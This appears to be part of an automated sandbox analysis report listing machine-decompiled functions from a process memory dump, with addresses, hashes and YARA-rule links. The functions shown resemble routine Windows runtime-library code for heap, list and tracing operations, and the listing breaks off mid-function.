                          • Instruction ID: a3673ea3216cdebfc508fd2d5cec8d96588df5cc20c120fe1cb9f0dd2e1cd23f
                          • Opcode Fuzzy Hash: ecdbdca7c33dd51eb5a495f551eace924b7b67f236f40c2416265dc8ab08ad69
                          • Instruction Fuzzy Hash: 8B21BEB2A00108EFDB05DF58CD81B6ABBBDFB40748F150568E908EB251D3B1FD118B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F6CF0, Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          C-Code - Quality: 80%
                          			E048F6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04897D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04897D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4855c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E048AF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E048AF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E048F7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04892400( &_v52);
								}
								_t21 = L04892400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                          0x048f6cfb
                          0x048f6d00
                          0x048f6d02
                          0x048f6d06
                          0x048f6d0a
                          0x048f6d0e
                          0x048f6d19
                          0x048f6d2b
                          0x048f6d1b
                          0x048f6d24
                          0x048f6d24
                          0x048f6d33
                          0x048f6d39
                          0x048f6d46
                          0x048f6d4f
                          0x048f6d61
                          0x048f6d51
                          0x048f6d5a
                          0x048f6d5a
                          0x048f6d69
                          0x048f6d6b
                          0x048f6d6d
                          0x048f6d6f
                          0x048f6d6f
                          0x048f6d74
                          0x048f6d79
                          0x048f6d7a
                          0x048f6d7f
                          0x048f6d82
                          0x048f6d88
                          0x048f6d89
                          0x048f6d90
                          0x048f6d94
                          0x048f6da7
                          0x048f6db1
                          0x048f6db1
                          0x048f6dbb
                          0x048f6dbb
                          0x048f6d90
                          0x048f6d69
                          0x048f6d46
                          0x048f6dc6

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1abd7a2df0f54d4a39479a8ed1d9e29b047de599ad78d47b1a855eca43b05f6c
                          • Instruction ID: 9ff61ff4b7922f151be1cc032effe01d52ca6546084d88f0c6bc4c5de2f815c4
                          • Opcode Fuzzy Hash: 1abd7a2df0f54d4a39479a8ed1d9e29b047de599ad78d47b1a855eca43b05f6c
                          • Instruction Fuzzy Hash: 9D21F2725006449BE711EF28CD44B6BB7ECAF81794F080F56FA40D7260F776E90AC6A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0494070D, Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E0494070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E049407DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0493AFDE( &_v8,  &_v12);
					E04941293(_t38, _v28, _t60);
					if(E04897D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E049314FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                          0x0494071b
                          0x04940724
                          0x04940734
                          0x04940738
                          0x0494074b
                          0x0494074b
                          0x04940753
                          0x04940753
                          0x04940759
                          0x0494075d
                          0x04940774
                          0x04940779
                          0x0494077d
                          0x04940789
                          0x04940795
                          0x049407a7
                          0x04940797
                          0x049407a0
                          0x049407a0
                          0x049407af
                          0x049407c4
                          0x049407cd
                          0x049407cd
                          0x049407af
                          0x049407dc

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                          • Instruction ID: cafe3c51358298409c977b582c9cb9decd5f3a6ab61db8fefc30c85c028d0376
                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                          • Instruction Fuzzy Hash: 4C21F2362042009FE705DF18CC84E6ABBAAEFC4354F048679FA958B395D630E909CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0489AE73, Relevance: .1, Instructions: 70COMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0489AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04897D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04897D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04897D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04897D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E048F7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                          0x0489ae78
                          0x0489ae7c
                          0x0489ae7e
                          0x0489ae81
                          0x0489ae86
                          0x0489ae8d
                          0x048e2691
                          0x0489ae93
                          0x0489ae93
                          0x0489ae93
                          0x0489ae98
                          0x0489ae9d
                          0x048e26a2
                          0x048e26b4
                          0x048e26a4
                          0x048e26ad
                          0x048e26ad
                          0x048e26b9
                          0x00000000
                          0x048e26bb
                          0x00000000
                          0x048e26bb
                          0x0489aea3
                          0x0489aea3
                          0x0489aea3
                          0x0489aeaa
                          0x048e26c0
                          0x048e26c9
                          0x048e26c9
                          0x0489aeb3
                          0x048e26d4
                          0x048e26e1
                          0x00000000
                          0x00000000
                          0x048e26e7
                          0x048e26ee
                          0x048e26f0
                          0x048e26f9
                          0x048e26f9
                          0x048e2702
                          0x048e2708
                          0x048e2708
                          0x048e270b
                          0x048e270f
                          0x048e2711
                          0x048e2711
                          0x048e2725
                          0x048e2725
                          0x00000000
                          0x0489aeb9
                          0x0489aeb9
                          0x0489aebf
                          0x0489aebf
                          0x0489aeb3

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                          • Instruction ID: ad30f36b4c4aba229e4e4bbc2dd034305d7af8beb2475f23734c8a40f340582c
                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                          • Instruction Fuzzy Hash: D621B031A01A85DBEF169B6AC944B3577E8AF46354F0D0AE1DD04CB6A2E774FC40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F7794, Relevance: .1, Instructions: 70COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E048F7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4967b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E048BF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04897D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E048B9AE0();
					_t24 = L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                          0x048f7799
                          0x048f779a
                          0x048f779b
                          0x048f77a3
                          0x048f77ab
                          0x048f77ae
                          0x048f77b1
                          0x048f77b1
                          0x048f77bf
                          0x048f77c4
                          0x048f77c8
                          0x048f77ce
                          0x048f77d4
                          0x048f77e0
                          0x048f77e0
                          0x048f77d6
                          0x048f77d6
                          0x048f77de
                          0x00000000
                          0x00000000
                          0x048f77de
                          0x048f77e5
                          0x048f77f0
                          0x048f77f3
                          0x048f77f6
                          0x048f77fd
                          0x048f7800
                          0x048f780c
                          0x048f7818
                          0x048f782b
                          0x048f781a
                          0x048f7823
                          0x048f7823
                          0x048f7830
                          0x048f7831
                          0x048f7838
                          0x048f783d
                          0x048f783e
                          0x048f784f
                          0x048f784f
                          0x048f785a

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 038e9a75ae6d3cd4829954932317408cbdca6109f8d6978220d353253f9769cd
                          • Instruction ID: 8bdd651e255df2db60e3caa902e42a8d3a8019583546aa05d9199ee57202365f
                          • Opcode Fuzzy Hash: 038e9a75ae6d3cd4829954932317408cbdca6109f8d6978220d353253f9769cd
                          • Instruction Fuzzy Hash: A7219F72510A44AFD725DF69DC90EABB7A8EF48740F140A6DE60AD7750D634E900CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AFD9B, Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E048AFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E048876E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                          0x048afd9b
                          0x048afda0
                          0x048afda1
                          0x048afdab
                          0x048afdad
                          0x048afdb0
                          0x048afdb8
                          0x048afe0f
                          0x048afde6
                          0x048afde9
                          0x048afdec
                          0x048ec0c0
                          0x048afdfe
                          0x048afe06
                          0x048afe06
                          0x048ec0c8
                          0x048afe2d
                          0x048afe2d
                          0x00000000
                          0x048afe2d
                          0x048ec0d1
                          0x048ec0e0
                          0x048ec0e5
                          0x048ec0e5
                          0x048ec0e8
                          0x00000000
                          0x048ec0e8
                          0x048afdf4
                          0x00000000
                          0x00000000
                          0x048afdf6
                          0x048afdfa
                          0x048afe1a
                          0x048afe1f
                          0x048afe1f
                          0x048afdfc
                          0x00000000
                          0x048afdfc
                          0x048afdcc
                          0x048afdd0
                          0x048afe26
                          0x00000000
                          0x048afe26
                          0x048afdd8
                          0x048afddb
                          0x048afddd
                          0x048afde0
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                          • Instruction ID: 748b9a70df8c270e5d346f4270fc3ba8f4964270fbb80afede11fb99ac2d4162
                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                          • Instruction Fuzzy Hash: F5217171A40644DFEB31CF09C540A66F7E5EB94B14F244A6DE645CB610D7B0BC10DB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04879240, Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E04879240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x494f708);
				E048CD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E048B95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E048B95D0();
				_t33 =  *0x49684c4; // 0x0
				L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x49684c4; // 0x0
				L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x49684c4; // 0x0
				E04892280(L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x49686b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E048B95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E048B95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04879325();
					_t50 =  *0x49684c4; // 0x0
					return E048CD0D1(L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                          0x04879240
                          0x04879242
                          0x04879247
                          0x0487924c
                          0x0487924e
                          0x04879255
                          0x04879257
                          0x0487925a
                          0x0487925f
                          0x0487925f
                          0x04879266
                          0x04879271
                          0x04879276
                          0x04879279
                          0x0487927e
                          0x04879295
                          0x0487929a
                          0x048792b1
                          0x048792b6
                          0x048792d7
                          0x048792dc
                          0x048792e0
                          0x048792e6
                          0x048792e8
                          0x048792ee
                          0x04879332
                          0x04879333
                          0x04879337
                          0x04879338
                          0x0487933a
                          0x0487933a
                          0x0487933d
                          0x04879342
                          0x04879342
                          0x04879345
                          0x04879349
                          0x0487934e
                          0x04879352
                          0x04879357
                          0x048792f4
                          0x048792f4
                          0x048792f6
                          0x048792f9
                          0x04879300
                          0x04879306
                          0x04879324
                          0x04879324

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6641c4217eb0c5eec43066b419866ab17b988b3fff70d498c5581bd681527fdc
                          • Instruction ID: 96b2062fbc265400b7ec95872c98043d44ed31744c7d702acee9ab051e53537b
                          • Opcode Fuzzy Hash: 6641c4217eb0c5eec43066b419866ab17b988b3fff70d498c5581bd681527fdc
                          • Instruction Fuzzy Hash: 8E21F471051A00EFE721EF6CCA50F59BBF9AF08708F144A6DE149C66A1CB78F941CB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AB390, Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          C-Code - Quality: 54%
                          			E048AB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04892280(_t12, 0x4968608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E048B00C2(0x4968608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                          0x048ab395
                          0x048ab3a2
                          0x048ab3a5
                          0x048ab3aa
                          0x048ab3b2
                          0x048ab3ba
                          0x048ab3bd
                          0x048ab3c0
                          0x048ab3c4
                          0x048ab3c9
                          0x048ea3e9
                          0x048ea3ed
                          0x048ea3f0
                          0x048ea3ff
                          0x048ea403
                          0x048ea409
                          0x00000000
                          0x00000000
                          0x048ea40b
                          0x048ea40b
                          0x048ea40f
                          0x048ea415
                          0x048ea423
                          0x048ea423
                          0x048ea415
                          0x048ab3d1
                          0x048ab3e8
                          0x048ab3e8
                          0x048ab3d9

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a4a811eba43400d8acb2463ff57602b881a4ab635fce7fb4c75bc204a1ea59f
                          • Instruction ID: ff79ed067742606555ab93edc06c340af7229645b4ae006f23a47557826768e6
                          • Opcode Fuzzy Hash: 9a4a811eba43400d8acb2463ff57602b881a4ab635fce7fb4c75bc204a1ea59f
                          • Instruction Fuzzy Hash: 6F114C333112149BDB18DA1D8D8157B73D6EBC6774B284A39DA16D7390D971BC02C691
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04904257, Relevance: .1, Instructions: 60COMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E04904257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x49508d0);
				E048CD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E049041E8(__ebx, __edi, __ecx, _t39);
				E0488EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x49687e4;
					_t18 =  *0x49687e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4965cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x49687e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x49687e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04877055(_t31 + 0xfffffff8);
								_t24 =  *0x49687e0; // 0x0
								_t18 = _t24 - 1;
								 *0x49687e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4965cd0;
				if( *0x4965cd0 <= 0) {
					L04877055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x49687e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x49687e8 = _t30;
						 *0x49687e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E048CD0D1(L04904320());
			}















                          0x04904257
                          0x04904257
                          0x04904257
                          0x04904259
                          0x0490425e
                          0x04904263
                          0x04904265
                          0x04904273
                          0x04904278
                          0x0490427c
                          0x0490427f
                          0x04904281
                          0x04904287
                          0x049042d7
                          0x049042d7
                          0x049042da
                          0x0490428d
                          0x0490428d
                          0x0490428f
                          0x04904292
                          0x04904297
                          0x0490429c
                          0x049042a0
                          0x049042a6
                          0x049042a8
                          0x049042ae
                          0x049042b3
                          0x00000000
                          0x049042ba
                          0x049042ba
                          0x049042bf
                          0x049042c5
                          0x049042ca
                          0x049042cf
                          0x049042d0
                          0x00000000
                          0x049042d0
                          0x049042b3
                          0x00000000
                          0x049042a6
                          0x0490429c
                          0x049042dc
                          0x049042dc
                          0x049042e3
                          0x04904309
                          0x049042e5
                          0x049042e5
                          0x049042e8
                          0x049042ee
                          0x049042f0
                          0x00000000
                          0x049042f2
                          0x049042f2
                          0x049042f4
                          0x049042f7
                          0x049042f9
                          0x04904300
                          0x04904300
                          0x049042f0
                          0x0490430e
                          0x0490431f

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff072ab694143eea72207f6d776dc08b02d64b050e34f9981b14b7795348c570
                          • Instruction ID: 162619c457f89f4c12101551cd1dba3ce54a89fb51a8e130c62e820d9c4ff5f0
                          • Opcode Fuzzy Hash: ff072ab694143eea72207f6d776dc08b02d64b050e34f9981b14b7795348c570
                          • Instruction Fuzzy Hash: E9218970606601DFD724EF69D504A14BBF5FB85318BA0C6BEC209CBA90EB39F881CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F46A7, Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E048F46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E048BF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E048AD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L048977F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                          0x048f46b7
                          0x048f46ba
                          0x048f46c5
                          0x048f46c8
                          0x048f46d0
                          0x048f46d4
                          0x048f46e6
                          0x048f46e9
                          0x048f46f4
                          0x048f46ff
